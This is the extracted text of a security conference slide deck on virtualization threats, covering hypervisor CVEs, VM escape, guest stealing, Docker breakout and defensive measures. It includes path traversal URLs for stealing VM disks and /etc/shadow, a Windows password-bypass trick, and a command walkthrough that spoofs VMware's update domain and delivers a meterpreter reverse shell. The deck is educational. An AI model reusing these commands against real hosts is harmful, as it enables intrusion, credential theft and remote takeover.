virtualization security and threat

# WHO AM I

Senior Security EngineerPenetration TestingIncident Response

DISCLAIMERSThis presentation do not encourage people to hack.

(For educational purpose only)

AND

Presentation do not cover all parts of virtualization Technology area.

(It is rearranged from my thesis research literature review)

TOPIC Virtualization and hypervisor Virtualization threats and issues Vulnerability Statistic of widely used Hypervisors Guest VM Attack Virtualization environment network Attack Hypervisor Attack Hypervisor management and API Attack Host Attack from VM Docker Breakout by shocker Use Virtualization as Attack Tools Security for Virtualization

Virtualization

VIRTUALIZATION

CloudgoogleiCloud

VIRTUALIZATION

VIRTUALIZATION

vShpere ClientvCenter

XenCenter

Virt-manager

Hypervisor

HYPERVISOR

VMVM

VM VMVMVMVMVM VM

HYPERVISOR

VMVM

VM VMVMVMVMVM VM

HYPERVISOR

VMwareworkstation

HYPERVISOR VS DOCKER**Application containers

Virtualization Threats

Vulnerability Statistic

CVE-DETAIL

cvedetails.com

107

118

5458 58

45

cvedetails.com

Bare-metal Hypervisor vulnerability

2008 2009 2010 2011 2012 2013 2014 2015

0 20 40 60 80 100 120 140 160 180 200

DoS

Gain Privileges

Overflow

Code Execution

Gain Information

Memory Corruption

Bypass something

Directory Traversal

XSS

Bare-metal Hypervisor vulnerability 2008 -2015

cvedetails.com

52%15%

12%

7%6.5%

4.5%2%

1%0.5%

IS VIRTUALIZATION THREAT DIFFERENCE FORM TRADITIONAL ENVIRONMENT ?

OS : Linux , Windows, Solaris

Application : Web , Web Service, Mail , FTP, DB

Hardware : CPU , Memory, Storage, NIC, Network

Traditional

Operating System




XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, Arp Poisoning

Operating System

Traditional


Application : Web , Web Service, Mail , FTP

Hypervisor components : Kennel , Lib, API, Network


Virtualization



Hypervisor components : Kennel , Lib, API, Network


XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, Arp Poisoning

Virtualization

AdditionalAttack Surface

GENERAL SECURITY ISSUE FOR VIRTUALIZATION Information Leakage.

Unauthorized Access Intentionally OR Unintentionally USERS OR Administrators

Data Remain In Storage Data Ownership. Data Migration when end of service. Multi tenancy

Share resource Use VM to commit fraud or Crime

Laws and regulations

VIRTUALIZATION TECHNICAL SECURITY ISSUE

GUEST VM ATTACK Traditional Attacks According To Services Guest VM attack other Guest VMs (Same network segment) Guest VM attack other Guest VMs on the same Hypervisor (VM hyper Jumping) Cross-VM Attack (Side Channel Attack) Guest Stealing Guest Copy

TRADITIONAL ATTACK

Hypervisor

Guest VM1 Guest VM2

VM ATTACKS OTHERS VM

Hypervisor

Guest VM1 Guest VM2

VM HYPER JUMPING

Hypervisor

Guest VM1 Guest VM2

CROSS-VM ATTACK (SIDE CHANNEL)

Hypervisor

Guest VM1 Guest VM2

Time orComputational Power

GUEST STEALING

https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk

Hypervisor

ManagementAPIfile

GUEST STEALING : VASTO

GUEST COPY (Authorized)- Passwords

- OS- Mail

- Cookies- Browser history- Sensitive Data- Databases- Configurations- Source codes- Software licenses- Many more...

GUEST COPY

Copy them

(Unauthorized)

IF ( VM ==win7 or XP)

IF ( VM ==2008 or 2012)

How about password ?

How about password ?Ans: Reset it !!!

IF ( VM ==2008 or 2012)

Insert CD to make tricky password reset via repair option

Copy cmd.exe to be Utilman.exeAnd reboot

Press Windows Key + U

Bravo !!!

ps :http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html

Or add another account as administrator and hashdump

And crack it by JTR

IF ( VM ==Unix) THEN singel_mode ();

Forensic tools to access dataVMDK

Forensic tools to access dataSnapshot

NETWORK ATTACK Traditional Attacks According To Services vSwitch Attack Sniffing Scanning Mitm

OPEN VSWITCH CVE-2012-3449 INSECURE DIRECTORY PERMISSIONS VULNERABILITY CITRIX XENSERVER VSWITCH CONTROLLER VERSION 6.0.2.

- vSwitch Attack

- SNIFF

LNot much sensitive in modern VM/Hypervisor

- SCAN

Directory Traversal Brute Force Attack

Auxiliary/Scanner/Vmware/Vmware_http_login Burp Suite Intruder

Response Splitting

MANAGEMENT API

CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability

Vmware Esxi 3.5 Or Earlier Fail To Sufficiently Sanitize User-supplied Input Data Exploiting The Issue May Allow An Attacker To Obtain Sensitive Information

From The Host Operating System

Hypervisor

ManagementAPI

System file


https://192.168.254.158:8333/sdk/../../../../../../etc/shadow

Hypervisor

ManagementAPI

System file


ESX root passwordCrack it with JTR !!!

BRUTE FORCE ATTACKBy Metasploit VMware Auxiliary Modules

BRUTE FORCE ATTACKBy Burp Suite Intruder

NO-CVE : HTTP RESPONSE SPLITTING

MANAGEMENT ENVIRONMENT ATTACK Hooking MiTM Fake Update

Vmware-vilurker Evilgrade

HOOKING

MITM

Hypervisor

Management SoftwareAttackerHypervisor

MITMWhich picture show we are under MiTM attack ???

MITM

We never know !!!!

MITMWhich picture show we are under MiTM attack ???

MITM

We never know again!!!!

MITM : vSphere Client

MITM : XenCenter

Admin

FAKE MANAGEMENT SOFTWARE UPDATE

Concept

Internet

softwareupdate.vmware.comESXi

Admin


Concept

Internet


APR SpoofingRougeDNS

FAKE MANAGEMENT SOFTWARE UPDATEBy vmware_vilurker

Credit:Watcharaphon Wongaphai

FAKE MANAGEMENT SOFTWARE UPDATEBy vmware_vilurker


By Evilgrade

create msfpayload > agent.exe (/usr/share/isr-evilgrade/agent/) create handler wait reverse connection add domain upgrade version into /etc/ettercap/etter.dns ettercap -tqm arp:remote /victim/ /dnsserver real/ -> p select dns_spoof run evilgrade


By Evilgrade

root@localhost:~# msfvenom p wondows/meterpreter/reverse_tcp LHOST=10.10.10.74 LPORT=8080 f exe > /opt/agemt.exe

root@localhost:~# cp /agent.exe /usr/share/isr-evilgrade/agent/agent.exe

root@localhost:~# echo softwareupdate.vmware.comA 10.10.10.74" >> /usr/local/share/ettercap/etter.dns

root@localhost:~# sudo ettercap -tqm arp:remote // //press proot@localhost:~# dns_spoof

root@localhost:~# msfconsole

msf>use exploit multi/handler

msf>set PAYLOAD windows/meterpreter/reverse_tcp

msf>set LHOST 10.10.10.74

msf>set LPORT 8080

msf> exploit

root@localhost :~# evilgradeevilgrade >config vmware

evilgrade >start By Evilgrade

FAKE MANAGEMENT SOFTWARE UPDATEResult

Admin


Result

Internet


APR SpoofingRougeDNS

HYPERVISOR ATTACK Compromised Hypervisor (Hyper-jacking)

Take Full Control Running A Rogue Hypervisor On Top Of An Existing Hypervisor Install Hypervisor Root Kits

Denial Of Service (Hypervisor Is A Great Single Point Of Failure) HyperCall Hooking/Attack

- DENIAL OF SERVICE : PSOD

- HYPER CALL HOOKING ATTACK

XEN i386

Paravirtualization

EXAMPLE CVE-2013-4553 : XEN DOMCTL_GETMEMLIST HYPERCALL IN XEN 3.4.X THROUGH 4.3.X CVE-2012-3495 : XEN HYPERCALL PHYSDEV_GET_FREE_PIRQ

BUFFER OVERFLOW DENIAL OF SERVICE EXPLOIT CODE TO EXECUTE IN PRIVILEGE

- HYPER CALL HOOKING/ATTACK

CVE-2014-4947 AND 4948LOCAL USERS DENY SERVICE AND OBTAIN POTENTIALLY SENSITIVE INFORMATION

CVSS V2 Base Score: 10.0 (High) Citrix Xenserver 6.2 SP1 And Prior Versions A Local User On The Guest System can Trigger A Buffer Overflow In HVM

(Hardware Virtual MACHINE) Graphics Console Support

Exploit On The Guest System Can Cause Denial Of Service Conditions Obtain Potentially Sensitive Information

Hypervisor

HVM Graphic Console

Guest VM Guest VM Guest VM

Resources

Hypervisor

HVM Graphic Console


Resources

AAAAAAAAAAAAAAAAAAAA...AAAAA

Hypervisor

HVM Graphic Console


ResourcesAAAAAAAAAAAAAAAAAAAA...AAAAA

Hypervisor

HVM Graphic Console


Resources

AAAAAAAAAAAAAAAAx00x00x00

Hypervisor

HVM Graphic Console


Resourcesxxxx

CVE-2015-3456 : VENOM Virtualized Environment Neglected Operations Manipulation Discovered by Jason Geffner, Crowdstrike senior security researcher The bug (Buffer Overflow) is in QEMUs virtual floppy disk controller (FDC). This vulnerable fdc code is used in numerous virtualization platforms and appliances,

notably XEN, KVM, VIRTUALBOX, and the native QEMU client.

Attacker need to have administrative or root privileges in the guest operating system in order to exploit VENOM

The VENOM vulnerability has existed since 2004, when the virtual floppy disk controller was first added to the QEMU codebase.

http://www.rapid7.com/resources/videos/venom-vulnerability-explained.jsp

Exploit to make Buffer overflow within the FDC, break out of the VM


Can access other VMs within that hypervisor


Can access other VMs within that hypervisorCan jump other VMs in other hypervisor


Can access other VMs within that hypervisorCan jump other VMs in other hypervisor

Can access to the underlying bare metal systems hardware and use that to see other systems on the hypervisor's network

HOST ATTACKVM ESCAPE

ResourcesHypervisor

Host

VM

HOST ATTACK

- USING PATH TRAVERSAL VULNERABILITY IN VMWARE'S SHARED FOLDERS

- CVE-2008-0923

- INSUFFICENT INPUT VALIDATION

VM ESCAPE

0xc20x2e0xc20x2e 0x2e0x2e ..

../../../../../../boot.ini

VM ESCAPEmodify VMFtp's source code to replace all occurrences of '+' with '\xc2' in an input pathname

VM ESCAPE

OR

VM ESCAPE

Modify task schedule as new job to run metX.exe and put to back to /windows/tasks

Put create task to host

Generate meterpreter

VM ESCAPE

VM ESCAPE

Run handler and wait until time to run Task

And Compromised

CVE-2012-0217 Virtualization Software Vulnerable To Privilege Escalation Attacks On Intel 64bits CPU

Some 64-bit operating systems and virtualization software programs are vulnerable to local privilege escalation attacks when running on intel processors (cpus)

Implemented The SYSRET Instruction In Their X86-64 Extension Attackers could exploit the vulnerability to force intel cpus to return a general

protection fault in privileged mode

Windows 7 And Windows Server 2008 R2, The 64-bit Versions Of Freebsd And Netbsd, The Xen Virtualization Software, As Well As Red Hat Enterprise Linux And SUSE Linux Enterprise Server, Which Include The Xen Hypervisor By Default

Architecture Vulnerability.

Architecture Vulnerability.CVE-2012-0217 Virtualization Software Vulnerable To Privilege Escalation Attacks On Intel 64bits CPU

code

MALICIOUS SCRIPT IN HYPERVISOR

ROP Xen Hypervisor Utilizing Return-oriented Programming (ROP). It modifies the data in the hypervisor that controls whether a VM is privileged

or not and thus can escalate the privilege of an unprivileged domain (DomU)

ROP Make Buffer overflow

ROP

LUnfortunately, this technique need a lot of factor to make it possible in today Hypervisor

FUZZING

USE VIRTUALIZATION AS ATTACK TOOL- Host Stealing (P2v host cloning)

VMware vCenter Converter Standalone

10.200.1.10

Administrator

*************************

10.200.1.100

root

*************************

10.200.1.10010.200.1.10

- Compromised Host- Get root/admin password0

10.200.1.10

Administrator

*************************Victim

10.200.1.100

root

*************************

ESX, Vmwareworkstation onHacker Machine

10.200.1.10010.200.1.10

Wait until finish

Dont forget to Dump RAM, too!!!P2V dont copy current data in RAM from victim server

volatility

Meterpreter pmdump

Finish ....and Completely PWNHave more time to get- DB ConnectionStrings- Sever Configurations- Source code- Crack more password- Dig more sensitive files

But.. Noting easy in the real life

DOCKER BREAKOUTBY DOCKER SHOCKER

https://github.com/gabrtv/shocker

DOCKER BREAKOUTBY DOCKER SHOCKER

Security for Virtualization

SECURITY FOR VIRTUALIZATION Contract , Law and regulation System Segmentation

VLAN /SDN Dedicate Management Network Dedicated Storage Networks Protect All Virtual System File (Snapshot , VHDD, Configuration)

Update Patches System Hardening Implement Security Monitoring And Detection Tools Security Assessment !!!! BCP / DRP

CONCLUSION Traditional Attack method can be use to attack Virtualization Technology Virtualization Technology has more attack surfaces Hypervisor is concerned as single point of failure Secure by design, Security Protection and hardening are important for

Virtualization Technology

Join to get security news update